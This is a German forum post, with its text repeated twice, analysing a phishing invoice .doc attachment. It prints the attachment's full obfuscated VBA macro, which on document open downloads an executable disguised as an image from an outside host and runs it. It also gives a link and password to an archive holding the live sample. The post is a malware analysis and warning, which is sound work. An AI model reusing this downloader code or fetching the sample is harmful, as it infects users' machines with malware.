wladislav1
gehört zum Inventar
Hey,
wir hatten eine Email bekommen, dass wir angeblich Schulden hätten. Im Anhang war eine .doc mit dem Namen "Rechnung_12472381.doc".
Ich hatte mir das Teil mal genauer angeschaut es stellte sich heraus, dass es ein macro hat. Das Macro wurde in Visual Basic geschrieben mit folgendem Code:
Die letzte Zeile ruft ""http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"" auf.
carhiresoft.com ist eine leere und harmlose seite, der Link der zum Bild führt, downloaded jedoch eine Datei Names "payload.exe"
Virustotal.com zu "paylaod.exe"
Ganz lustig alles in allem.
Sollte sich jemand dafür interresieren, habe ich die .doc und den VB code in ein Archiv auf meinem Webspace geworfen:
saires.de/server/evil.7z passwort:"donteatme"
Hab die Seite bei Google Safe Browsing angezeigt.
wir hatten eine Email bekommen, dass wir angeblich Schulden hätten. Im Anhang war eine .doc mit dem Namen "Rechnung_12472381.doc".
Ich hatte mir das Teil mal genauer angeschaut es stellte sich heraus, dass es ein macro hat. Das Macro wurde in Visual Basic geschrieben mit folgendem Code:
verborgener Text:
Code:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
YVFDXNTOHWT
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Function GRPGFHKOSHI(ByVal SVBUWHUNJWT As String, ByVal CMYATDWOVAO As String) As Boolean
Dim TPOORILDSDL As Object, VGNOIZXJPBH As Long, MOCHEOHRDMH As Long, EBLGIQMBFDP() As Byte
Set TPOORILDSDL = CreateObject("Microsoft.XmlHttp")
TPOORILDSDL.Open "GET", SVBUWHUNJWT, False
TPOORILDSDL.Send "123"
Do While TPOORILDSDL.readyState <> 4
DoEvents
Loop
EBLGIQMBFDP = TPOORILDSDL.responseBody
MOCHEOHRDMH = FreeFile
If Dir(CMYATDWOVAO) <> "" Then Kill CMYATDWOVAO
Open CMYATDWOVAO For Binary As #MOCHEOHRDMH
Put #MOCHEOHRDMH, , EBLGIQMBFDP
Close #MOCHEOHRDMH
Dim RRSNFVXRLLM
RRSNFVXRLLM = Shell(CMYATDWOVAO, 1)
Set TPOORILDSDL = Nothing
End Function
Sub YVFDXNTOHWT()
GRPGFHKOSHI "http://carhiresoft.com/img/calc.png", Environ("USERPROFILE") & "\useradmin.com"
End Sub
carhiresoft.com ist eine leere und harmlose seite, der Link der zum Bild führt, downloaded jedoch eine Datei Names "payload.exe"
Virustotal.com zu "paylaod.exe"
Ganz lustig alles in allem.
Sollte sich jemand dafür interresieren, habe ich die .doc und den VB code in ein Archiv auf meinem Webspace geworfen:
saires.de/server/evil.7z passwort:"donteatme"
Hab die Seite bei Google Safe Browsing angezeigt.